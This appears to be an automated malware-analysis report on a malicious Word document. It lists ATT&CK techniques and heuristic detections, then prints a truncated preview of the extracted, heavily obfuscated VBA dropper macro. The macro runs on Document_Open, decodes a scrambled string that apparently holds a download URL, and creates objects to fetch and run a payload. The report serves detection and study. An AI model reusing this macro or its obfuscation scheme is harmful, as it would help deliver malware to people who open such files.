Verdict: MALICIOUS (Risk Score 242)

Malware Insights

MITRE ATT&CK

- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1059 Command and Scripting Interpreter
The sample contains VBA macros, specifically a Document_Open macro that uses CreateObject and CallByName, indicating malicious intent. ClamAV identifies this as Doc.Dropper.Donoff-5743527-0, a known dropper family. The VBA script is heavily obfuscated, but its structure and the heuristic firings strongly suggest that it is designed to download and execute a second-stage payload.
Heuristics (7)

- ClamAV: Doc.Dropper.Donoff-5743527-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17171 bytes |

SHA-256: 004338b876172bf23e5fe06427a334736e24cedd26f79e3ac9c227378828db62
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function zjvtkw(ByVal EneZhuMLALS As Integer) As String
ZPXML
zfarugwCSxZN 8198
If rShEw(8828, "") Then
PLThskoYeHCkKc
lxEgWVi = 7276
EwxMCKawZQ 4905, "aQs"
XwvRNnfMcSqZ
End If
fOBSFGi = "PQ0N4"
zjvtkw = "R6tkj"
End Function
Private Function ePrLfao() As Integer
VKrjvgueqmynkC False
irBKsGMhRF 2233, "5XCR"
OAsIpuSUqvtIZ
ePrLfao = 5204
End Function
Private Function VindiSyvz() As String
If LcSRSkC(9126) Then
gEodb = 8634
LqIGPV
Else
NKEStekPFcyN True
DPfiaoa
aeYhQfLrlKiAW
End If
ZivhAtaqi = True
VindiSyvz = ""
End Function
Private Sub Document_Open()
JcuJgZSPIbjH.IZLicevjXeIYi
End Sub
Private Function aCxMjUjrbsXJ(ByVal oFtpOCUgJxmoDQ As String, ByVal oZEekeemrBLj As Integer) As Integer
cUAyPOiaSddCS 4374
OyiQWBe
IfppVDOO
If BvfmyAE Then
iPyoWFbuOGJ
Else
cgbweTm = ""
eVZHioPhoCfbw
hPDbCLksMVJ
End If
aCxMjUjrbsXJ = 1337
End Function
Attribute VB_Name = "JcuJgZSPIbjH"
Private Function nCwbCG(ByVal OfDncyUDYx As Object, ByVal mpeAJ As Boolean) As Object
Dim FsvQoHHZNbc As Integer
VkdjxKFoKNGkG = False
Set nCwbCG = OfDncyUDYx
End Function
Public Sub IZLicevjXeIYi()
On Error GoTo RSXBeLPTGQ
SCqVNn.jqpSDuVd
zaYOckZF = True
SCqVNn.GyjBMB
gxDFoqVjbjKB
Exit Sub
XeFzFUU = 5724
RSXBeLPTGQ:
End Sub
Private Sub gxDFoqVjbjKB()
Dim AxwSBciQd As String
Dim dCKrBZLqARM As Integer
RgJxyyxIfMo = "Y2iEU"
PpoZQYGNIe 5737, hXZsZMDazMNynx.UMUkSbtlYu, eNFXoRFTUgE.kfYnCwOcUqCQ("hBXtBtpF:L/GB/XboTTlLhaOLpHiaXcT.TGeLuv/cXaGtvaFlvTovg/BoFOffOiLcveOG12v.XdXFatG", "LHTOvAFBXGJ")
YgevSnglnePKDt = 6867
hXZsZMDazMNynx.qmUoJ 6258, hXZsZMDazMNynx.UMUkSbtlYu
End Sub
Public Function MqIegZ(ByVal scSzihWYjkO As String) As Object
Dim WxdaUDCZU As String
Dim BgdnjGwdjxDp As Boolean
lQkqaMIHx = "Yg"
Set MqIegZ = nCwbCG(CreateObject(scSzihWYjkO), True)
End Function
Private Function TkAaqNiugeFvp(ByVal LtRpyUA As String) As Integer
If kDagfONzf(8404, "eKxnl") Then
gDoIIYKACL = 7354
FgVCrR
uFcMxU
TIIftFLt
eHQUHZLJeGV = "FyU"
Else
GVCPaMtBb
tRLGrCtGKIsP "AA", 4897
McVlthSJHPScKy
End If
IOgdhJZbC 4147, 3708, 9625
TkAaqNiugeFvp = 2465
End Function
Private Sub PpoZQYGNIe(ByVal rdsVXTI As Integer, ByVal ipdXGwe As String, ByVal TcDYWL As String)
Dim iTHIOUdzuOH As Integer
Set odRpYcOEa = LpFfqzxIM.KtAtRybiPuP(TcDYWL, 7913, True)
LpFfqzxIM.Jfaum "cByA", DQlscLn, 3895, odRpYcOEa
GCwslUAvvJnQh = True
hXZsZMDazMNynx.yVzwxTZQ 6655, KiapLRPY.JjeQWAcvbYHjq(2621, odRpYcOEa, "AQ", eNFXoRFTUgE.kfYnCwOcUqCQ("RFiesZNpToZnsOOeBDoFdZyq", "FYODTNiZq")), "", ipdXGwe
End Sub
Private Function DQlscLn() As String
DQlscLn = eNFXoRFTUgE.kfYnCwOcUqCQ("CLa4nKL'tK L/doKw/nLl.oLa.dKK bKiKLnqaYry4 /RfiL/leq", "RKL4q./Y")
End Function
Attribute VB_Name = "eNFXoRFTUgE"
Private Sub BIDOA()
wPnomOxHx False, 4187, False
ETkgWmR 3928, True, 3091
End Sub
Public Function xBbsbbLQ(ByVal FeGDGeBgWXX As String, ByVal MMYhf As Boolean, ByVal tqsXTrBNPTLp As String) As String
Dim vzKMmsu As Boolean
Dim MXeFRRtiP As Integer
RJUnyhRCPQAqM = "wkg"
xBbsbbLQ = FeGDGeBgWXX & tqsXTrBNPTLp
End Function
Private Sub QcEiB()
lBfhu 3835, "FBE", 8764
CpgessZuStQ 5484, 760, 7177
GKMnraxczD = 3182
eEMzA
End Sub
Private Function VgXWEnzFrDTi(ByVal jelFMHhKRXbN As String, ByVal mFttnQyZaWnfV As String) As String
If Not ASYOSPlVIOhOYQ.FKEEQCX("Bg", mFttnQyZaWnfV, jelFMHhKRXbN, "r7k") Then
VgXWEnzFrDTi = mFttnQyZaWnfV
End If
End Function
Private Function iIlHfRgoJ() As Integer
luvwKrYOrMu = "KFyR"
iIlHfRgoJ = 1
End Function
Public Function kfYnCwOcUqCQ(ByVal AyroPtLhDTPjL As String, ByVal MCfmXDvpTMmIOz As String) As String
Dim CqkAbAxlFjnGkC As String
Dim OJmprnU As String
Dim VtSLxNTwNvkEFg As Integer
For TwLbiHU = iIlHfRgoJ To ASYOSPlVIOhOYQ.ULdqCkM(AyroPtLhDTPjL)
CqkAbAxlFjnGkC = VgXWEnzFrDTi(MCfmXDvpTMm
```

... (truncated)